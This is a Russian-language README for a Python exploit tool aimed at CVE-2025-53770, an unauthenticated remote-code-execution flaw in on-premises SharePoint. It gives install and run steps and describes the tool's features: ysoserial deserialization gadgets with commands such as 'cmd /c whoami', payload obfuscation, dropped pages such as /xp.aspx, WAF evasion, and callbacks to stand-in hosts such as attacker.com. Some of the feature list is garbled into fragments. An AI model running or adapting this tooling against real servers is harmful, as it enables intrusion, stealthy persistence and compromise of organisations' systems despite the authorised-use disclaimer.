
Сложный, управляемый мастером Python-эксплойт, нацеленный на CVE-2025-53770 — критическую (CVSS 9.8) уязвимость неавторизованного удаленного выполнения кода (RCE) в локальной версии Microsoft SharePoint Server (2016, 2019, Subscription Edition).
Divine Absolute — это сложный, управляемый мастером инструмент эксплуатации на Python, нацеленный на CVE-2025-53770, критическую (CVSS 9.8) уязвимость удалённого выполнения кода без аутентификации в локальных версиях Microsoft SharePoint Server (2016, 2019, Subscription Edition). Эта уязвимость, раскрытая как zero-day 19 июля 2025 года, возникает из-за десериализации недоверенных данных в /_layouts/15/ToolPane.aspx. Инструмент предназначен исключительно для этического тестирования на проникновение и авторизованных исследований безопасности, обеспечивая непревзойдённую точность, скрытность и адаптивность для разведки, эксплуатации и верификации.
Репозиторий: https://github.com/exfil0/CVE-2025-53770
⚠️ Юридическое предупреждение: Этот инструмент предназначен для законного, авторизованного использования только в контролируемых средах с явного разрешения. Несанкционированное использование против систем, которыми вы не владеете или не имеете разрешения на тестирование, незаконно и может повлечь серьёзные правовые последствия. Автор не несёт ответственности за неправомерное использование.
ToolPane.aspx с расширенной оценкой и регулярными выражениями (например, 16.0.0.\d+-\w+?).ToolPane.aspx с надёжными обходами.WebRequest.Create, Dns.GetHostEntry).-enc)./xp.aspx, на основе UUID).www.google.com), пользовательские URL или внутренние пути SharePoint (например, /_layouts/15/sharepoint.aspx).RequestException, настраиваемыми кодами состояния и путями.MicrosoftSharePointTeamServices), пути (например, /versions.aspx) и регулярные выражения./_layouts/15/ToolPane.aspx./ToolPane.aspx, использование правил WAF (например, Cloudflare).pip install requests termcolor
pip install pythonnet
ysoserial.exe в известный путь (например, ./ysoserial.exe).# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (через Homebrew)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe доступен, или укажите путь к нему во время выполнения.Запустите интерактивный мастер:
python divine_absolute.py
Recon: Сканирует на наличие SharePoint и версию.Exploit: Отправляет полезную нагрузку в ToolPane.aspx.Full: Разведка + эксплуатация (опциональный агрессивный режим).https://sharepoint.example.com).ObjectDataProvider) и команду (например, cmd /c whoami).http://attacker.com/callback или sub.attacker.com).NONE, BASIC_REFLECTION, CONCAT_OBFUSCATED или пользовательский фрагмент.NONE, FIXED (например, /xp.aspx), RANDOM (на основе UUID).DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.http://127.0.0.1:8080)./sitepages/result.txt), регулярные выражения (например, Xanthorox.*), коды состояния (например, 200,403), количество попыток, задержку и таймаут.python divine_absolute.py
# Выберите: Mode=Recon, Target=https://sharepoint.example.com
python divine_absolute.py
# Выберите: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# Выберите: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# Выберите: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com